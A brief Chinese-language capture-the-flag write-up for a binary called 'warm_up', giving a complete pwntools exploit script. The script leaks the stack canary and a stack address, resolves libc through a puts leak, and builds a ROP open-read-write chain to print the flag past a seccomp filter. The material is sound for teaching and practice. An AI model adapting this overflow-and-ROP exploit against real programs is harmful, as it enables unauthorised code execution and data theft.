Seccomp
简答的seccomp,直接读文件,然后输出即可
1.泄漏Canary
2.泄漏Stack基址
3.通过Gadget写orw
EXP
1 | from pwn import* |
2 | from LibcSearcher import * |
3 | context.log_level = 'debug' |
4 | |
5 | p = process('warm_up') |
6 | elf = ELF('warm_up') |
7 | p.sendlineafter('warm up!!!','U'*0x17 + 'H') |
8 | p.recvuntil('H',drop = True) |
9 | canary = u64(p.recv(8).replace('\x0A','\x00').ljust(8,'\x00')) |
10 | stack = u64(p.recv(6).ljust(8,'\x00')) |
11 | log.success('Canary:\t' + hex(canary)) |
12 | log.success('Stack:\t' + hex(stack)) |
13 | |
14 | puts_plt = elf.plt['puts'] |
15 | start_main = elf.got['__libc_start_main'] |
16 | pop_rdi_ret = 0x400BC3 |
17 | main_addr = 0x400B30 |
18 | ##leak the real address |
19 | p.recvrepeat(0.5) |
20 | payload_I = 'U'*0x18 + p64(canary) + p64(stack) + p64(pop_rdi_ret) + p64(start_main) + p64(puts_plt) + p64(main_addr) |
21 | p.sendline(payload_I) |
22 | start_main_addr = u64(p.recv(6).ljust(8,'\x00')) |
23 | libc = LibcSearcher('__libc_start_main',start_main_addr) |
24 | log.success('Start_Main:\t' + hex(start_main_addr)) |
25 | libcbase = start_main_addr - libc.dump('__libc_start_main') |
26 | |
27 | pdi=0x21102+libcbase #pop rdi;ret; |
28 | psi=0x202E8+libcbase #pop rsi;ret; |
29 | pdx=0x01B92+libcbase #pop rdx;ret; |
30 | write_got = libcbase + libc.dump('write') |
31 | open_got = libcbase + libc.dump('open') |
32 | read_got = libcbase + libc.dump('read') |
33 | |
34 | fake=stack-0x20 #sub offset;fake point the rsp |
35 | log.success('Fake:\t'+hex(fake)) |
36 | p.sendlineafter('warm up!!!','U') |
37 | p.recvuntil(' ?') |
38 | payload_II='./flag\x00\x00'+'U'*0x10+p64(canary)*2 |
39 | payload_II+=p64(pdi)+p64(fake)+p64(psi)+p64(0)+p64(pdx)+p64(0)+p64(open_got) |
40 | payload_II+=p64(pdi)+p64(3)+p64(psi)+p64(elf.bss()+0x100)+p64(pdx)+p64(0x100)+p64(read_got) |
41 | payload_II+=p64(pdi)+p64(1)+p64(psi)+p64(elf.bss()+0x100)+p64(pdx)+p64(0x100)+p64(write_got) |
42 | p.sendline(payload_II) |
43 | p.interactive() |